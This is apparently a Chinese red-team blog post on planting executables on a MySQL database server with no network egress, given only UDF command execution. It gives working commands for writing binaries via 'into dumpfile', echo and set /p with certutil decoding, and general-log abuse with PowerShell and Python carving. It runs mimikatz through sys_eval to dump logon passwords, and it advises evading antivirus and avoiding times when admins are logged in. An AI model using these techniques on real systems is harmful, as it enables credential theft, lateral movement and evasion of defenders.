关于站库分离数据库不出网落地Exe方式探究-Mysql
前言
之前偶尔会遇到站库分离数据库不出网&没有Webshell的情况,只有一个可以执行命令的shell,这种情况下如果想进行横向只能通过数据库来落地我们的工具。
注:文中只是为了演示数据库如何落地exe,可能部分环境过于理想化,在实战中很难遇到。
1、Mysql
环境:Windows+Mysql 5.7.26
模拟环境:对web目录没有写入权限,但是对lib/plugin有写入权限,可以使用UDF执行命令。
1.1 into dumpfile
1.1.1 导出exe
复制exe文件的16进制,然后执行。
select unhex("exe文件的16进制") into dumpfile "\\路径\\文件名.exe"
导出后的文件可以正常执行
1.1.2 执行
这里落地了一个mimikat.exe,然后执行
select sys_eval('C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\M.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\res1.txt"')
执行完毕后可以使用windows的more、type或者mysql的Load_file函数查看执行结果
1.1.3 exe退出
如果运行了一个exe程序,但是没有给他退出的命令或者是他自己不会终止退出。例如我直接运行mimikatz.exe没有给参数传入,那么他会在目标服务器直接弹一个黑窗,一直卡在这,直到程序被终结。
这种情况可以在桌面手动关闭,也可以通过shell关闭。
select sys_eval('tasklist /svc |findstr "进程名.exe"')
将结果进行16解码即可得到进程id,再Kill掉就好了。
1.1.4 注意点
导出的文件,不能是已经存在的文件,否则会报错。
导出路径中的"\"为两个,否则会转义。
使用findstr查找进程的时候,要使用双引号包裹进程名。
正常执行程序的时候,会秒弹一个黑窗然后退出,使用暂时没找到解决办法。尽量避免管理员在线的时候执行exe,使用query user可查看管理员是否在线。
1.2 into outfile
into outfile会转义换行符,导致exe无法正常执行。
正常exe
导出的exe
在大小上也可以明显看出,导出的比正常的要大很多。
1.3 echo导出
1.3.1 全部写入
既然可以执行命令,那么可以使用echo将exe-16进制写入&追加到一个文件,然后再使用certutil解码还原。
select sys_eval("echo exe_hex >> c:\\users\\admin\\desktop\aaa.txt && certutil -decodehex c:\\users\\admin\\desktop\aaa.txt c:\\users\\admin\\desktop\aaa.exe")
将16进制全部复制执行报错了,但是echo 123可以正常写入,可能是长度问题?
1.3.2 Windows命令行限制
百度了一下windows命令行最大长度为8191,16进制长度是113898,做了一个小实验来验证百度到的答案:
复制所有16进制到cmd,echo 所有16进制>> 11.txt。因为有长度限制,只会复制一部分到cmd。查看cmd中最后的exe-hex 08B45F4890424E85D在全部exe-hex中的位置-8176,加上echo空格>>空格11.txt刚好8190个字节。
1.3.3 分段追加写入
直接全部写入会超出命令行限制,只能去分段写入。使用echo每追加一次都会自动换行,在百度找到了使用set /p=""这种方式可以实现不换行追加。
这个是个体力活,在本地就不手动了追加了,写个脚本假装手工追加写入。
将导入的16进制文件解码即可得到可执行文件
1.3.4 遇到的问题
- 使用set /p分段追加无论是手动还是脚本都会遇到一个问题。执行完他已经写入,但不会自己终止结束这条命令并换行,需要手动不断回车来结束
1.4 日志
1.3.1 常见Getshell日志类型
常用的日志导出有通用日志、慢日志查询,经过测试他们在操作方面没太大差距,这里只使用通用日志来实验。
1.3.1 通用日志
通用日志是最常用的一种日志Getshell的方式,会记录我们执行的查询语句。
show variables like 'general_log'; #查看日志是否开启
set global general_log=on; #开启日志功能
show variables like 'general_log_file'; #看看日志文件保存位置
set global general_log_file='log_path'; #设置日志文件保存位置
设置日志路径,然后开启日志,执行select "exe-hex",再使用正则匹配出exe-hex进行解码即可。
使用powershell匹配出exe-hex
powershell -c "&{$b=[System.IO.File]::ReadAllBytes('日志文件');set-content -value $b[开始位置..结束位置] -encoding byte -path '保存路径';}"
使用[System.IO.File]::ReadAllBytes读取日志全部内容,再使用set-content筛选出我们的exe-hex。
在shell中可以使用type来读取日志文件,复制到本地查看exe-hex在日志中的位置,我在phpmyadmin测试使用udf去执行type只读取到了118134个字节,不过刚好读取完我们的exe-hex。
1.3.2 注意点
这里尽量先设置好日志存储路径再开启日志记录,日志会少一点。
在执行完select "exe-hex"之后要关闭日志记录,否则powershell无法打开
- powershell导出exe-hex的时候会覆盖源文件
1.5 思考
以下几个点是在实验过程中&偶然灵光一现感觉可行的思路
大都是使用certuil解码?有没有其他的解码方式?(已解决)
没找到其他windows自带的程序可以解码,之后想到可以python解码,由此想到其他支持在命令行执行单行代码的语言php、perl等。其他的不支持在命令行执行代码的语言,可以再使用上面的方法导出该语言对应的解码代码,再去调用执行进行解码。
下面是python3的一句话hex解码
python -c "import binascii;text=open('res.exe','ab');text.write(binascii.a2b_hex(open('exe-hex.txt').read()))"
其他语言也大致类似思路,这里就不演示啦。
outfile既然导出二进制会增加转义、换行,如果可以使用powershell、编程语言将其再过滤,是不是也可以用。(未解决)
最后日志使用powershell可以获取到exe-hex,如果没有powershell感觉使用编程语言也可以匹配出来。(已解决)
python -c "import re;import binascii;z=re.findall('(4D5A.*?6500)\"',open('log.log').read());text=open('res1.exe','ab');text.write(binascii.a2b_hex(z[0]))"
感觉echo导出方式这个也适用于不出网对web目录没写入权限的命令执行
1.6 总结
导出方式 | 概述 | 推荐优先级 |
---|---|---|
dumpfile | 只要做好免杀,可以直接导出exe就可以用了 | 1 |
outfile | 导出二进制数据较会增加转义、换行,exe无法直接执行 | 暂时不推荐 |
echo | 有点费手.... | 3 |
日志 | 需要过滤出exe-hex,有一定使用限制。 | 2 |
1.7 参考链接
https://blog.csdn.net/leshami/article/details/39779225 Mysql日志介绍-通用日志
https://www.cnblogs.com/KHZ521/p/14961303.html Mysql 通用日志Getshell
https://blog.csdn.net/u011250186/article/details/108409562 Windows命令行长度限制
https://blog.csdn.net/weixin_39914107/article/details/111429294 python十六进制转换为字符串